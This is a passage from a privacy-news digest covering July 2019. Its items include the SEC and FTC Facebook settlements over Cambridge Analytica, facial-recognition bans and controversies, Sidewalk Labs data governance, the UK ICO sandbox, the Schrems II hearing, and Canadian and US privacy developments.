The Securities Exchange Commission announced that it’ll fine Facebook $100 million as part of a settlement in relation to a probe into the social network’s handling of users’ data [read SEC PR here & 16 pg PDF complaint]. It alleged that Facebook’s public disclosures didn’t offer sufficient warning that developers and other third parties, who in obtaining user data, may have violated the social network’s policies or failed to gain user permission. It said that Facebook “presented the risk of misuse of user data as merely hypothetical,” when it knew that the data had actually been misused. The SEC, along with the Federal Trade Commission and other federal agencies, began probing Facebook in July 2018 following Facebook’s disclosures in March 2018 that Cambridge Analytica, a digital consultancy that had ties to the Trump presidential campaign, improperly accessed personal information of up to 87 million of the social network’s users. “Public companies must accurately describe the material risks to their business,” said Stephanie Avakian, co-director of the SEC’s enforcement division. “As alleged in our complaint, Facebook presented the risk of misuse of user data as hypothetical when they knew user data had in fact been misused. Public companies must have procedures in place to make accurate disclosures about material business risks.” Facebook’s general counsel, Colin Stretch, wrote that the social network shares the SEC’s interest in transparency, and noted that it’s updated its disclosures and controls accordingly [read blog post]. The FTC also unveiled its $5 billion settlement with Facebook on Wednesday over the Cambridge Analytica scandal. Facebook said the agreement “will mark a sharper turn toward privacy, on a different scale than anything we’ve done in the past,” while CEO Mark Zuckerberg said in a separate statement that the social network would make “major structural changes” to how it builds products and conducts business. The broad strokes of the FTC settlement have been rumored for months and Facebook has already set aside the money to pay the fine, the largest the agency has levied against a tech company. In 2012, the FTC fined Google a record-setting $22.5 million. [CNET News | Facebook to Pay $100 Million SEC Fine Over Cambridge Data Use | Facebook to pay separate $100 million SEC fine over Cambridge Analytica scandal]

US – FTC Launches New Webpage for ‘Do Not Call,’ Robocall Data

The U.S. Federal Trade Commission has announced the creation of a new interactive webpage carrying data regarding the National Do Not Call Registry and telemarketing robocalls. The new page, which will be updated quarterly, allows users to view state- and county-specific data related to the number of DNC and robocall complaints. Additionally, the page is able to show the types of calls garnering the most complaints in a state while tracking the trends of the calls over time. [FTC]

US – FTC Looks for Comments on COPPA Rule

The U.S. Federal Trade Commission announced it will accept comments on the effectiveness of amendments made to the Children’s Online Privacy Protection Rule back in 2013. The COPPA Rule requires websites that collect data from users under the age of 13 to provide notice and obtain consent from parents whenever a child’s data is collected, used and disclosed. The FTC seeks feedback on whether the rule affected young users’ ability to access the sites and if the rule properly defines an online service or website that is “directed to children.” The agency will host a workshop on this topic Oct. 7. Comments will be accepted for 90 days once a notice is published in the Federal Register. [FTC.gov]

US – Google Faces Class Action for Allegedly Recording Voices Without Consent

A class-action complaint has been filed in a U.S. District Court in California alleging that Google violated state laws regarding consent and voice recordings. The plaintiffs argue that Google’s smart software, including Google Assistant and Google Home, recorded conversations “on multiple occasions, including when they failed to utter a hot word.” The plaintiffs’ lawyers wrote in their complaint that “California’s privacy laws recognize the unique privacy interest implicated by the recording of someone’s voice. That privacy interest has been heightened by companies exploiting consumers’ private data.” [MediaPost]

US – Study: Organizational Accountability in U.S. Law and Its Relevance to a Federal Data Privacy Law

Hunton Andrews Kurth’s Centre for Information Policy Leadership [CIPL: see here] recently published a white paper: Organizational Accountability’s Existence in U.S. Regulatory Compliance and its Relevance for a Federal Data Privacy Law [read 25 pg PDF here — also see its related Q&A document on organizational accountability in data protection, 10 pg PDF here]. The White Paper looks at the origins and applications of organizational accountability in U.S. law, and concludes that accountability’s current role in U.S. regulatory frameworks lends significant support for including accountability in any new federal privacy law. Specifically, the White Paper examines the elements of accountability as they relate to: 1) The Foreign Corrupt Practices Act and the accompanying 2012 resource guide [see here & 130 pg PDF] produced by the U.S. Department of Justice and the Securities and Exchange Commission; 2) The Sarbanes-Oxley Act of 2002 and Chapter Eight of the U.S. Sentencing Commission Federal Sentencing Guidelines Manual [see here & 608 pg PDF]; 3) The U.S. Department of Justice Criminal Division Guidance on the Evaluation of Corporate Compliance Programs [see 19 pg PDF]; 4) The Federal Financial Institutions Examination Council Bank Secrecy Act/Anti-Money Laundering Examination Manual [see 10 pg PDF here]; and 5) The Department of Health and Human Services Office of Inspector General Compliance Program Guidance for Hospitals [see here]. [Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

US – Report: Equifax Emphasizes Data Security Culture Following Data Breach

After its 2017 data breach, Equifax has taken measures to enhance its cybersecurity practices. The credit-monitoring firm has spent more than $1 billion in cybersecurity since the incident and has allocated an additional $1.25 billion for tech and security between 2018 and 2020. The company has also hired 1,000 IT and cybersecurity employees over the past year. Before it reached its settlement with the U.S. Federal Trade Commission, Equifax Chief Information Security Officer Jamil Farshchi said the firm has looked closer at the progress of security projects and ensured detailed reports were sent to the board. [Wall Street Journal]

US – EPIC Challenges FTC-Facebook Settlement

The Electronic Privacy Information Center is attempting to block automatic approval of the U.S. Federal Trade Commission’s $5 billion settlement with Facebook. EPIC filed a complaint to a Washington court, saying the settlement “wipes Facebook’s slate clean without Facebook even having to admit guilt for its privacy violations.” EPIC has requested a hearing that would consider consumer complaints along with reviewing the deal’s parameters. Granting a hearing would potentially force the FTC to revise the settlement after hearing consumer complaints. [The New York Times]

Privacy Enhancing Technologies (PETs)

US – Multi-Institution Research Project to Tackle Privacy Policy Confusion

The National Science Foundation is funding a $1.2 million research project aiming to enable users to ask questions when reviewing privacy policies. Researchers from Penn State, Carnegie Mellon University and Fordham University will collaborate to create software designed to help people understand the privacy policies of apps and websites. Shomir Wilson, assistant professor at Penn State’s College of Information Sciences and Technology and a principal investigator on the project, said, “If users are given privacy information in ways they can understand, they’re more likely to make decisions that align with their interests and feel secure.” A 2017 Deloitte study found 90% of people consent to legal terms and conditions without reading them. [Penn State News]

RFID / IoT

CA – AB OIPC Rules that a Vehicle’s GPS Data is “Personal Information”

A July 8 decision by the Alberta Privacy Commissioner [see Order P2019-04: 17 pg PDF here & CanLII here] has confirmed that in some cases, an organization’s requirement for independent contractors to install GPS tracking devices on their vehicles will not violate applicable privacy legislation but does the data collected may be considered “personal information”. The case involved a complaint by independent contractors retained by NAL Resources Management LTD. [see here] NAL required the contractors to install GPS devices on their vehicles, with a default setting of “on” so as to “promote good driving behavior” and allow NAL to locate the contractor in the event of a “Safety Line call out.” The independent contractors filed a complaint alleging the data was “personal information” and therefore NAL required their consent for its use, collection, or disclosure. This decision investigated the difference between the definition of “employee” in Alberta’s Personal Information Protection Act [see OIPC guidance here & 64 pg PDF here] , and whether the information collected by the GPS constituted “personal employee information” versus “personal information”. If information was considered “personal information”, the contractor’s consent would be required for the use, collection, and disclosure of said information. However, if the information was considered “personal employee information” no consent was required. The commissioner found that the GPS data had a personal dimension given that the data collected would enable NAL to determine the physical location of the contractor, as an individual, which could be expected to have personal consequences for the contractors as individuals. Accordingly, the GPS tracking data was “personal information.” However, the commissioner determined that in the present circumstances the GPS data was not “personal information” but rather “personal employee information” because the independent contractors were considered “employees” under the act. Rreasoning that information about a contractor reasonably required by an organization to manage a contractual relationship would be “personal employee information” under PIPA, regardless of the fact that at common law, independent contractors are not considered employees. This decision is a solid reminder that words such as “employee” can carry different meanings across different legislation. It is also a reminder that employers need to seriously consider whether any productivity/data tracking services are collecting “personal information” under their province’s specific privacy legislation. While this was a decision of Alberta’s privacy commissioner, the definition of “personal information” is mirrored in the federal privacy legislation PIPEDA [OPC guidance here] [Strigberger Brown Armstrong Blog]

Smart Cities

CA – Data Governance for Data Sharing: Lessons from IESO for Toronto’s Quayside?

Teresa Scassa – Smart city data governance has become a hot topic in Toronto in light of Sidewalk Labs’ proposed smart city development for Toronto’s waterfront [see here , here & wiki here]. In its Master Innovation Development Plan [MIDP: see here, also access & download draft master plan here & here], Sidewalk Labs has outlined a data governance regime for “urban data” that will be collected in the development. It sets out to do a number of different things: 1) it provides a framework for sharing ‘urban data’ with all those who have an interest in using this data. This could include governments, the private sector, researchers or civil society; and 2) It proposes a governance body Urban Data Trust (UDT) be charged with determining who can collect data within the project space, and with setting any necessary terms and conditions for such collection and for any subsequent use or sharing of the data the 5-person governance body, [will have] representation from different stakeholder communities, including “a data governance, privacy, or intellectual property expert; a community representative; a public-sector representative; an academic representative; and a Canadian business industry representative” The merits and/or shortcomings of this proposed governance scheme will no doubt be hotly debated as the public is consulted and as Waterfront Toronto develops its response to the MIDP. In spite of the apparent novelty of data trusts, there are already many different existing models of data governance for data sharing. These models may offer lessons that are important in developing data governance for smart city developments. Merlynda Vilain [here] and I have just published a paper that explores one such model [see: Governing Smart Data in the Public Interest: Lessons from Ontario’s Smart Metering Entityhere or 26 pg PDF here] In the early 2000’s the Ontario government decided to roll out mandatory smart metering for electrical consumption in the province [read about the history of the program here] The proposal raised privacy concerns, particularly because detailed electrical consumption data could reveal intimate details about the activities of people within their own homes. The response to these concerns was to create a data governance framework that would protect customer privacy while still reaping the benefits of the detailed consumption data. The Smart Metering Entity [SME: here], the data governance body established for smart metering data, provides an interesting use case for data governance for data sharing. We carried out our study with this in mind; we were particularly interested in seeing what lessons could be learned from the SME for data governance in other context. We found that the SME made a particularly interesting case study because it involved public sector data, public and private sector stakeholders, and a considerable body of relatively sensitive personal information. It also provides a good example of a model that had to adapt to changes over a relatively short period of time – something that may be essential in a rapidly evolving data economy. [The remainder of this blog post provides an overview of Scassa’s and Vilain’s findings] [Teresa Scassa Blog] SEE ALSO: Apple Publicly Trolls Google Over Controversial Smart City Surveillance Plans | From heated bike lanes to privacy concerns: What you need to know about Sidewalk Labs | Toronto civic leaders urge public officials to ‘welcome’ Sidewalk Labs’ plan | Business leaders push for Sidewalk Labs smart-city development to be built on Toronto’s waterfront | Sidewalk Labs decision to offload tough decisions on privacy to third party is wrong, says its former consultant | Ann Cavoukian still has problems with Sidewalk Labs’ approach to data with Quayside | Commissioner recommends updating privacy laws to prepare for smart cities ]

UK – ICO Announces First Data Protection Sandbox Participants

On July 29, 2019, the UK Information Commissioner’s Office (ICO) announced the 10 projects that it has selected, out of 64 applicants, to participate in its sandbox [read detailed PR]. The sandbox [read ICO  blog post], for which applications opened in April 2019, is designed to support organizations in developing innovative products and services with a clear public benefit. The ICO aims to assist the 10 organizations in ensuring that the risks associated with the projects’ use of personal data is mitigated. The selected participants cover a number of sectors, including travel, health, crime, housing and artificial intelligence. The projects selected by the ICO include proposals by government institutions: 1) Greater London Authority [here – looking at the Violence Reduction Unit]; 2) Heathrow Airport Holding Limited [see here – looking at the use of facial recognition technology]; 3) NHS Digital [here – looking at collecting and managing patient consents for the data sharing]; and 4) Ministry of Housing, Communities and Local Government [here – looking at matching personal information controlled by multiple parties in the rental sector]. Private organizations participating in the sandbox include: 5) FutureFlow [here – looking at collaborative approaches to tackling financial crime]; 6) Novartis Pharmaceuticals UK Limited [here – looking into the use of voice technology within healthcare]; 7) Trust Elevate [here – looking into verified parental consent and age checking of a child]; 8) Jisc [here – developing a Code of Practice with universities wishing to investigate the use of student activity data]; 9) Onfido [here – looking at how to identify and mitigate algorithmic bias in machine learning models]; and 10) Tonic Analytics [here – looking at use of innovative data analytics technology to improve road safety & preventing and detecting crime] Read more about participants & proposals here. The projects are expected to have completed their participation in the sandbox by September 2020. In announcing the projects selected for inclusion in the sandbox, Information Commissioner Elizabeth Denham highlighted the mutual benefit of the sandbox, stating that “the sandbox will help companies and public bodies deliver new products and services of real benefit to the public, with assurance that they have tackled built-in data protection at the outset.” [Privacy & Information Security Law Blog (Hunton Andrews Hurth)]

HK – Hong Kong Limits Functions on New Smart Lampposts

Smart lampposts being deployed in Hong Kong will be used with limited features as the government responds to privacy concerns. The government is deactivating a function that detects vehicle speed using Bluetooth-device recognition, another that detects car types using license plate recognition, and one that monitors the dumping of industrial waste at blackspots. “We do not have any functions for facial recognition … even for traffic snapshots, we will decrease the quality to a point that faces cannot be recognised, before the data is made public,” Assistant Government Chief Information Officer Tony Wong said, adding that a public consultation will be held to further alleviate privacy concerns. [Hong Kong Free Press]

Surveillance

CA – New Fredericton Transit on-Board Cams, Wi-Fi Raise Privacy Concerns

Fredericton Transit has introduced on-board cameras and free Wi-Fi to three buses this week — a pilot project the city says will improve transit services and, ultimately, rider experience [read announcement]. According to transit manager Meredith Gilbert, the cameras, which cost about $5,000 in total, will capture movement data and the Wi-Fi will “capture user data just by tracking cellphone use through the Wi-Fi in terms of where people are coming and going.” Gilbert said the project could eventually lead to real-time information gathering — information that could be shared with riders and keep them updated on the status of service routes. When asked about privacy concerns, Gilbert said the city has followed best practices outlined by the Office of the Integrity Commissioner , which has taken on the responsibility as the province’s privacy watchdog. “There should be no concerns for customers,” she said. But integrity commissioner Charles Murray [read bio] — the province’s privacy watchdog — has questions about the collection and use of private data and how the public will be protected. Murray said the transit authority needs to be certain that riders understand what it’s doing with their data. “There has to be a pretty direct connection between your collection and the usage you plan to make of the data because in the era of big data the temptation is, ‘Well, let’s just take it all in and then we’ll see what we’ve got,’” Murray said. “But the law and the best practices don’t align with that. You need to have a pretty clear idea of what you’re looking for and then you can build your safeguards for privacy based on that and then you’re taking out only what you want.”‘ He said a city is “kind of vague” in that regard. The Office of the Integrity Commissioner would be the main oversight authority for a public body when it comes to matters of privacy, Murray said, but because of resources a review is only triggered by a complaint. Murray also raised the issue of riders being unable to opt out from being captured on camera if the project expands. Users would be faced with sharing data or not taking the bus. “One of the things we often talk about in the privacy world is the capacity for people to opt out,” he said. “How do they protect themselves? And it doesn’t strike me like a system like this as described provides much options there.” The pilot project, part of Fredericton Transit’s strategic plan, will be evaluated in January. [CBC News]

Telecom / TV

US – NYC Lawmakers Propose Bill That Bans Sale of Cellphone Location Data

Lawmakers in New York City are introducing a bill that would make it illegal for cellphone companies and mobile apps to share user location information collected in the city without the customer’s permission. In addition to providing steep fines, ranging from $1,000 per violation to $10,000 per day per user for multiple violations, the bill also gives customers the right to sue if their data has been shared without their permission. The proposed legislation “would also exclude the collection of location data in ‘exchange for products or services.’“ If the bill goes into effect, New York City will be the first city to ban the sale of location data to third parties. [The New York Times]

US Government Programs

US – New Federal Policy Regarding CDOs and Data Governance

The Office of Management and Budget [OMB: here] has issued a recent memorandum that moves the federal government forward in embracing the importance of the “governance” of data. On July 10, 2019, OMB issued a memorandum [see: M-19-23 “Phase 1 Implementation of the Foundations for Evidence-Based Policymaking Act of 2018: Learning Agendas, Personnel, and Planning Guidance”] The Foundations for Evidence-Based Policymaking Act [Evidence Act], enacted on January 14, 2019, mandates Federal evidence-building activities, open government data, and confidential information protection and statistical efficiency. It includes provisions for the appointment by each agency of a Chief Data Officer and the establishment of a CDO council [on this point read earlier blog post here]. The OMB memorandum announces a commitment to aligning related data and information policy guidance across government in four phases, the first of which is categorized as “Learning Agendas, Personnel and Planning.” Some of the key elements for implementation of Phase 1 consist of the following: 1) All agencies are required to create “Learning Agendas,” which identify and set priorities for evidence building at the agency in consultation with various stakeholders. The memorandum sets out a series of deadlines for accomplishing Learning Agendas through February 2022. A detailed Appendix to the memorandum provides further guidance on Learning Agendas; 2) All agencies are to have designated individuals in the positions of Chief Data Officer by July 13, 2019. CDOs shall have authority and responsibility for data governance and lifecycle data management at each agency. In addition, agencies covered under the Chief Financial Officers Act of 1990 shall be required to designate Evaluation Officers and Statistical Officials, and all agencies are encouraged to do so as well; 3) By September 30, 2019, the head of each agency is required to establish an agency Data Governance Body, chaired by the CDO, with participation from relevant senior-level staff in agency business units, data functions, and financial management. The Data Governance Body “will set and enforce priorities for managing data as a strategic asset to support the agency in meeting its mission and, importantly, answering the priority questions laid out in the agency Learning Agenda.” A detailed Appendix to the memorandum provides further guidance on constituting data governance and leadership; 4) A Chief Data Officer Council will consist of all agency Chief Data Officers, the Administrator of the Office of Electronic Government, and the Administrator of the Office of Information and Regulatory Affairs [OIRA]. The CDO Council will meet regularly to establish government-wide best practices for the use, protection, dissemination, and generation of data, and will promote various best practices as further set out in the memorandum; and 5) Each agency is also to develop and maintain an Open Data Plan, as required by the Evidence Act, which describes the agency’s efforts to make government data open to the public. Each Open Data Plan is to be included in the agency’s Strategic Information Resources Management Plan. OMB will provide further guidance on Open Data Plans in the next phase of implementation of the Evidence Act. As the new OMB memorandum makes clear, the role and functions of the CDO, and the emergence of a requirement for a designated Data Governance Body at each federal agency consisting of senior-level staff, reflects the growing maturity of the discipline of information governance generally [on this point read earlier blog post here]. [DBR on DATA (Drinker Biddle)]

US Legislation

US – Sen. Hawley Introduces Bill to Halt ‘Social Media Addiction’

U.S. Sen. Josh Hawley, R-Mo., has proposed a bill that would limit the techniques that keep social media users glued to the platform.. Hawley’s aim with the Social Media Addiction Reduction Technology Act is to curb the incessant attention paid to platforms such as Twitter, Instagram and Snapchat by removing features like infinite scroll and autoplay video. “Too much of the ‘innovation’ in this space is designed not to create better products, but to capture more attention by using psychological tricks that make it difficult to look away,” Hawley said in a statement. “This legislation will put an end to that and encourage true innovation by tech companies.” [Washington Post]

US – Sens. Drawing Up Federal Privacy Bills

There are two ongoing efforts within the U.S. Senate to draft a federal privacy bill. U.S. Sens. Jerry Moran, R-Kan., and Richard Blumenthal, D-Conn., are crafting a bill with provisions that would increase enforcement by the Federal Trade Commission and take precedence over any state law. Meanwhile, Sen. Maria Cantwell, D-Wash., is working with Sens. Roger Wicker, R-Miss., and Brian Schatz, D-Hawaii, on a separate draft that has been circulating through the Senate. Wicker said his group is still mulling data security and a private right of action in their bill. All five senators were previously collaborating on a single bill as part of the Senate Committee on Commerce, Science, and Transportation. [Bloomberg Law]

Workplace Privacy

US – Privacy Class-Action Lawsuit Over Employee Fingerprint Scans

A class-action lawsuit has been filed against Saporito Finishing alleging violation of the Illinois Biometric Information Privacy Act. Plaintiff Elliot Smart alleges the metal-finishing company made employees clock in and out of work using their fingerprints without obtaining permission or consent as required by law. Smart also claims the company never informed him how the company stores the information. He is seeking damages of $1,000 to $5,000 per violation. The lawsuit was filed just weeks after a similar class-action lawsuit was filed against a Chicago blood test laboratory. [Cook County Record]

+++

 

 

1-15 July 2019

Biometrics

US – FBI, ICE Use Driver’s Licenses in Facial-Recognition Surveillance

The U.S. Federal Bureau of Investigation and Immigration and Customs Enforcement have been using state driver’s license databases for facial-recognition searches without the driver’s knowledge or consent. Neither Congress nor state legislatures have approved distributing driver information using this technology. San Francisco and Somerville, Massachusetts, have banned the use of facial-recognition technology by law enforcement and public agencies. Officials from the agencies are expected to testify at an upcoming House Committee on Homeland Security hearing on the agencies’ use of the technology later this week. [The Washington Post | FBI, ICE using state driver’s license photos without consent for facial recognition searches: report]

US – Face Datasets Used to Train Facial-Recognition Tech

Databases of people’s faces are being compiled without their knowledge and shared around the world. The datasets contain images pulled from social media, photo websites and cameras in restaurants and on college campuses. Some datasets contain thousands of images, but others contain millions. Privacy advocates have raised concerns over a lack of oversight of the datasets, noting that people’s faces are being used to create “ethically questionable technology.” While Facebook and Google do not distribute face datasets, other companies have shared images with governments of other countries “for training artificial intelligence.” [New York Times]

CA – BCLC Facial-Recognition Tests Producing High Number of False Positives

A facial-recognition system used by the British Columbia Lottery Corporation to use to keep troublesome patrons out of casinos has produced a high rate of false positives. Of the 3,647 alerts to come out of the system, 3,255 were rejected. The system was able to accept 387 results; however, only 26 were confirmed by staff members, according to the documents. “These systems are complicated. It was overpromised in the first place. Surveillance is something that is selling a sense of security and a sense of control. And that’s always partial. It’s always incomplete,” Freedom of Information and Privacy Association President Mike Larsen said. BCLC plans to continue testing the system at one casino through 2020. [CTV News]

UK – Researchers Urge Scotland Yard to Stop Using Facial-Recognition Tech

Researchers at the University of Essex are calling on Scotland Yard to stop using facial-recognition technology until “significant concerns” of the tech violating human rights laws are addressed, the Independent reports. The call comes after researchers found that four out of five “suspects” are innocent. The independent report, which was commissioned by the Metropolitan Police, raises concerns over watchlist criteria being out of date, operational failures and issues with “consent, public legitimacy and trust.” The Met gave researchers access to six out of ten trials over an eight-month period. [The Independent]

US – Coalition Asks US Government to Ban Facial Recognition on the Public

On July 10 House Homeland Security Committee is holding a hearing to question officials with the Transportation Security Administration, Customs and Border Protection, and the Secret Service for the agencies’ broad use of the technology in the US [read hearing details & watch]. In advance of the hearing two public campaigns were launched against the use of facial recognition on the general public. In a letter to the committee dated July 9, the Electronic Privacy Information Center [EPIC], Electronic Frontier Foundation [EFF], Mijente and others said: “The use of face recognition technology by the DHS poses serious risks to privacy and civil liberties, threatens immigrants, broadly impacts American citizens, and has been implemented without proper safeguards in place or explicit Congressional approval. The technology is being deployed today by authoritarian governments as a tool to suppress speech and monitor critics, minorities, and everyday citizens. Congress should not permit the continued use of face recognition in the United States absent safeguards to prevent such abuses.” Meanwhile, digital rights group Fight for the Future, launched a website calling for a complete federal ban on facial recognition [see here]. Evan Greer, deputy director of Fight for the Future said: “People shouldn’t be subjected to authoritarian government surveillance just because their local city council failed to act. Congress has the authority to impose basic limits on what law enforcement across the country can do. There’s a reason your local police department doesn’t have access to missiles and carpet bombs. Congress should act now to ban this uniquely dangerous surveillance weapon.” [BuzzFeed]

US – Facial-Recognition Use by Federal Agencies Draws Lawmakers’ Anger

State and federal lawmakers are calling for new rules and investigations surrounding the use of facial-recognition scans of driver’s license databases by Immigration and Customs Enforcement and other agencies, fueling a debate over the technology some on Capitol Hill have said represents a “massive breach of privacy and trust.” Public records obtained by Georgetown Law’s Center on Privacy and Technology and first reported Sunday by The Washington Post revealed how ICE, the FBI and other agencies had worked for years with state officials to search through millions of license photos without drivers’ knowledge or consent. The House Homeland Security Committee is expected to discuss possible guardrails on Wednesday during the third congressional hearing in as many months over the largely unregulated technology, which has faced bipartisan resistance due to concerns over false arrests, public surveillance and government misuse. Revelations about the scale of federally requested face scans have sparked anger in Congress, with Rep. Zoe Lofgren (D-Calif.) saying in a statement to The Post that the facial-recognition searches marked “a massive, unwarranted intrusion into the privacy rights of Americans by the federal government, done secretly and without authorization by law.” “Americans don’t expect — and certainly don’t consent — to be surveilled just because they get a license or ID card,” Sen. Patrick J. Leahy (D-Vt.) said in a tweet. “This has to stop.” [In contrast] Rep. Mike D. Rogers (Ala.), the top Republican on the Homeland Security committee, said in a statement to The Post that Department of Motor Vehicles photos should remain available to law enforcement and “should be used in our fight against terrorists, criminals and violent international cartels.” Congress, Rogers added, “should focus on making sure [the Department of Homeland Security] and other departments are using the most accurate and effective facial recognition technology available.” [The Washington Post]

EU – Privacy Regulators Seek to Clamp Down on Facial-Recognition Tech

EU privacy regulators have discussed the launch of a new set of guidelines to increase restrictions on facial-recognition software. A priority with the guidelines would be to redefine the data collected by facial-recognition tech as “biometric data.” A change in verbiage would place the information under the “sensitive data” category of the EU General Data Protection Regulation. The GDPR requires explicit consent for sensitive data collections. The change through these proposed guidelines would hinder the use of facial recognition, as those using the technology would need to do more than post general public notices or alerts regarding the software’s use. [Politico]

US – Second City Bans Government Use of Facial Recognition Technology

On Friday, June 28 the City of Somerville, Massachusetts (home of Tufts University) banned governmental use of facial recognition technology. The resolution was approved by an 11-0 vote of the City Council. The resolution compares the broad application of facial surveillance technologies to “requiring every person to carry and display a personal photo identification card at all times,” and noting potential disparate impacts on women, young people, and people of color. The resolution bars the City and anyone acting on the City’s behalf from using facial recognition technology or using any information obtained from facial recognition technology. Somerville is only the second municipality in the nation to have enacted such a ban, with San Francisco having done so in May of this year [see San Francisco’s Board of Supervisors meeting details, agenda, minutes & ordinance]. Bills that would ban the governmental use of facial identification technology throughout the Commonwealth of Massachusetts are currently pending in both houses of the state legislature, though the prospects of the bills passing are unclear [specifically, see Senate Bill No. S.1385 and House Bill No. H.1538] would place a moratorium on government use of face surveillance. Other states are considering similar bans as well. Somerville’s move to restrict the government use of facial recognition technology is a reminder that questions of the potentials and pitfalls of biometric technology extend not just to consumer/business and employee/employer relationships, but also to the relationship between citizens and government. [Security, Privacy and the Law (Foley Hoag) | Massachusetts Can Become a National Leader to Stop Face Surveillance | Leading police bodycam manufacturer bans facial recognition technology | Vice]

Big Data / Data Analytics / Artificial Intelligence

WW – AI, Machine Learning Have Impacted Pre-Fill Data in Canada

A new study reports on the effect artificial intelligence and machine learning have had on pre-fill data in the country. Opta Information Intelligence has used its property insurance valuation service over the past 10 years to pre-fill approximately 90% of Canadian business quotes. Opta President Greg McCutcheon said AI and machine learning have helped to make the pre-filled information much more accurate. “We’ve been able to train computers to recognize the type of construction and features about that home by gathering information through imagery,” said McCutcheon, who added the techniques are particularly accurate when powered by data collected in urban areas. [Canadian Underwriter]

Canada

CA – Privacy Concerns Arise Over BC Community’s Security Camera Program

The City of Parksville on Vancouver Island is offering a one-time rebate of up to $100 for residents and business owners who wish to install cameras on their property in an effort to reduce crime is raising eyebrows among privacy advocates [watch here 2 min]. City council has allocated $2,500 for the program this year, with plans to double that fund to $5,000 for 2020. All that’s needed is an application form and a receipt for the camera’s purchase and installation. Cameras are only eligible if they were purchased on or after July 2. But the BC Freedom of Information and Privacy Association (BCFIPA) said public education and consultation is needed to prevent Parksville from becoming a city where every corner is covered by cameras. “It opens it up to make it easy for everyone to just put cameras in their backyard and it becomes an acceptable practice,” Sara Neuert, the association’s executive. [Global News]

CA – OPC Launches Investigation into Desjardins Breach

The Office of the Privacy Commissioner of Canada and Québec Access to Information Commission announced they have launched an investigation into the Desjardins Group data breach. The OPC will look to determine whether the financial institution had complied with the Personal Information Protection and Electronic Documents Act and Québec’s Act Respecting the Protection of Personal Information in the Private Sector. In response to a call from Conservative Leader Andrew Scheer, the House of Commons will host an emergency hearing on the breach “in the next week or so,” according to Committee Chair MP John McKay. [priv.gc.ca]

CA – OPC Asked to Investigate Vehicle Data Collection

The Freedom of Information and Privacy Association has asked the Office of the Privacy Commissioner of Canada to investigate the data collection practices of vehicles within the country. In addition to the complaint, the group also sent the OPC a new version of its 2015 “The Connected Car” report. The study examined the privacy practices of 36 vehicle manufacturers to see what data they collected and how it was used. “Some things are better than they were,” said Vincent Gogolek, the association’s former executive director. “But some of the major problems that we had back in 2015 are still being seen today.” Meanwhile, Apple has placed privacy-themed billboards around Toronto. [Vancouver Sun]

CA – SK OIPC Recommends Cannabis Dispensaries to Fall Under HIPA

As part of its annual report, the Office of the Saskatchewan Information and Privacy Commissioner proposes for cannabis dispensaries to be subject to the Health Information Protection Act. The commissioner’s office recommends the term “trustee” within the act should be amended to include “corporations or persons which operate a facility providing a health service including massage therapists and cannabis dispensaries.” “To some extent it depends on how much the dispensary is collecting, but it does strike us that if they’re collecting information on your purchases of marijuana then at least they have the obligation to safeguard that information,” Saskatchewan Information and Privacy Commissioner Ron Kruzeniski wrote. [Regina Leader-Post]

EU Developments

EU – Schrems II Heard In Europe: Potential Huge Impact on Global Data Transfers

On July 9 the Court of Justice of the European Union [CJEU] heard oral submissions in the latest case questioning the legal validity of international data transfer mechanisms under the GDPR [the case is C-311/18: see docket], such as Standard Contractual Clauses and the EU-US Privacy Shield. The Irish Data Protection Commissioner [DPC] is seeking a ruling that would find the so-called Standard Contractual Clauses, which are used to legitimise the transfer of personal data from Europe all around the world, as invalid because they do not provide adequate protection for individuals’ data. The CJEU heard from the DPC, Facebook, the Electronic Privacy Information Center, DigitalEurope, the Business Software Alliance, the European Commission, the European Data Protection Board, the US government, several EU Member States and representatives of the original complainant Max Schrems. If the Standard Contractual Clauses are declared invalid, this will have a huge impact on global trade, effectively putting the brakes on the international transfer of data. For his part, it became clear during yesterday’s oral submissions that Mr Schrems himself does not wish the Standard Contractual Clauses to be declared invalid. He is asking the DPC to ensure that it enforces the clauses instead. However, questions remain regarding the ability of importing organisations to comply with the requirements of the Standard Contractual Clauses because of the access that certain foreign law enforcement agencies can have to data held in their jurisdiction. Similarly, if an organisation is unable to comply with the Standard Contractual Clauses, it follows that the same may apply to the EU-US Privacy Shield, which is why that may also be considered. The CJEU’s Advocate General has said he will give his non-binding opinion on the case on 12 December this year, with a full decision expected from the CJEU by early 2020. It is difficult to predict what the outcome will be but the impact on global trade should the Standard Contractual Clauses and the Privacy Shield be found to be invalid should not be underestimated. In the commercial context, such a decision would leave companies with very little option to be able to transfer personal data overseas other than seeking consent from the individuals in question, something which is likely to be impractical in almost all circumstances and not possible in certain cases. For example, the GDPR makes it clear that employee consent is rarely likely to be valid, meaning that companies would not be able to rely on that to transfer employee personal data out of the EU. [Data Notes (Herbert Smith Freehills) | The Schrems Saga Continues: Schrems II Case Heard Before the CJEU | Facebook Faces Activist, EU Judges in ‘Schrems II’ Privacy Case | EU postpones ruling on Schrems II; Facebook warns of trade disruption]

UK – ICO Releases 2018–19 Annual Report

The U.K. Information Commissioner’s Office released its annual report for 2018–19. The agency received 41,661 data protection complaints over a 12-month span that ended March 31, up from the 21,019 complaints it received in the 2017–18 period. U.K. Information Commissioner Elizabeth Denham called the arrival of the EU General Data Protection Regulation “the biggest moment of the year,” as the agency cited its work with businesses to help implement the law as a highlight in the report. “This saw people wake up to the potential of their personal data, leading to greater awareness of the role of the regulator when their data rights aren’t being respected,” Denham wrote. “The doubling of concerns raised with our office reflects that.” [ICO.org.uk]

UK – ICO Offers Input on UK Online Harms White Paper

The U.K. Information Commissioner’s Office has published a response to the Department for Digital, Culture, Media & Sport’s consultation on the “Online Harms White Paper.” “The impact of online harms is an issue of significant public concern,” the ICO said in its response. “It is essential that we have regulation that makes a real difference, but also remains proportionate so that people are able to continue to enjoy the real benefits of the internet.” The response went on to address the need for innovative solutions and doing so with a full scope when considering regulation. Considerations for data protection and duty of care were also highlighted. [ICO.ork.uk]

UK – ICO Updates Guidance on Cookies and Similar Technologies

